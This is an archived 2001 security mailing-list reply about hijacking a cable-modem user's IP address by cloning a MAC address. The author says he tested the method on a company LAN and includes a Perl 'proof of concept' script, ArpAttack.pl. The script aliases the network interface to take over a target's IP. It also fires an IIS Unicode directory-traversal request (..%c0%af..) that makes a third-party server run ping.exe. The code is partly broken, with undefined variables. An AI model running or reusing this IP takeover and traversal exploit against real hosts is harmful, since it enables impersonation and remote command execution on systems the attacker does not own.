Re: Hijack IP Address using cable modem

[cdowns <cdowns () SKILLSOFT COM>]

Patrick Patterson wrote:

> -----BEGIN PGP SIGNED MESSAGE-----
>
> I think I see where Patrick was coming from with this:
>
> Victim turns on his computer, and gets an IP address
> Cracker, while sniffing the Cable segment notices that IP adress foo is
> assigned to MAC bar
> Cracker changes his own MAC address to bar, and brings up IP address foo on
> this new MAC address (some Ethernet cards have overwritable MAC addresses)
> Since both Cracker and Victim have the same MAC, Cracker get's all packets
> for Victims computer, and is able to impersonate victim.
>
> This is just a slightly more sophisticated IP Address Spoofing attack.... and
> I don't think it will work...
>
> > From what I know of Cablemodem networks, there are actually several parts.
>
> 1: The cable network - the 'Modem' talks to the Cable Company terminal
> equipment and ensures that you are a valid subscriber.
> 2: The IP Network - the routers keep track of which IP and MAC, is on which
> Cable Modem - thus making this attack unlikely to succeed....
>
> I haven't tested this, and might be horribly wrong, but I don't think so -
> this is one of those things that looks better in theory than in practice - Is
> anyone from @HOME or ATT around to confirm/deny what's I've written?
>
> On Wednesday 28 March 2001 09:09, Nick Summy wrote:
> > Now I hardly know anything about this subject, so correct me If im wrong,
> > but I have a few questions.
>
> <SNIP>
>
> - --
>
> Patrick Patterson                       Tel: +1 514 485-0789
> President, Chief Security Architect     Fax: +1 514 485-4737
> Carillon Information Security Inc.      E-Mail: ppatterson () carillonis com
>
> - ----------------- The New Sound of Network Security -----------------
>                   <<  http://www.carillonis.com  >>

i tried this today on my company LAN and it worked perfect.. had to do some
adjusting but worked so, im writing a little perl script right now and its
almost done.
just will use uni-code server to execute the icmp request to the spoofed machine
in progress.

# ---------------------------------------------
# This program was inspired by a thread that started on
vuln-dev () securityfocus com
# most cable networks have ARP Broadcasts enabled so arp spoofing works on that
network
# this is a proof of concept program and is intended for educational purposes
only therefore !
# i am not responsible for anything bad or just plain evil done with this
program.
# enough said you know the rules.
# -D
system ("clear");

use LWP::Simple;
use Getopt::Std;
getopts("tnbu:?",\%args);

if ( $args{t} ) {
    $target = $args{t};
} else {
    Usage();
}
if ( $args{"?"} ){
    Usage();
}
# <---------------------------------------
## thisis where we need to create a network alias on the local machine\
## for the network target we would like to spoof.
## we will cheat for now and use system calls just for the sake of getting
something that works....
if ( $args{n} ) {
    $netmask = $args{n};
}
if ( $args{b} ) {
    $broadcast = $args{b};
}
print "creating network alias .... \n";
sleep 2;
# system call here.
system ("/sbin/ifconfig eth0:0 $target netmask $netmask broadcast $broadcast");
print ("ifconfig eth0:0 interface for spoof... .\n");
print ("----------------------------------------\n");
system ("/sbin/ifconfig eth0:0");

# use uni-code server for icmp to spoofed host.
# <---------------------------------------
print "not here \n";
if ( $args{u} ) {
    $uni_target =
get("http://$uni_target/scripts/..%c0%af../winnt/system32/ping.exe?+$target";);
    print ("reply from $uni_test\n");
}
# <---------------------------------------
sub Usage {
    print <<USAGE;
  Usage: perl ArpAttack.pl -t <target> -n -b -u <uni-code server>
      -? this menu
      -t <target to spoof>
      -n netmask
      -b broadcast
      -u uni-code server to use
 Sample: perl ArpAttack.pl -t 192.168.x.x -n 255.255.255.0 -b 192.168.0.255 -u
192.168.20.x
 Note: this program needs to be run as root
USAGE
    exit;
}

-D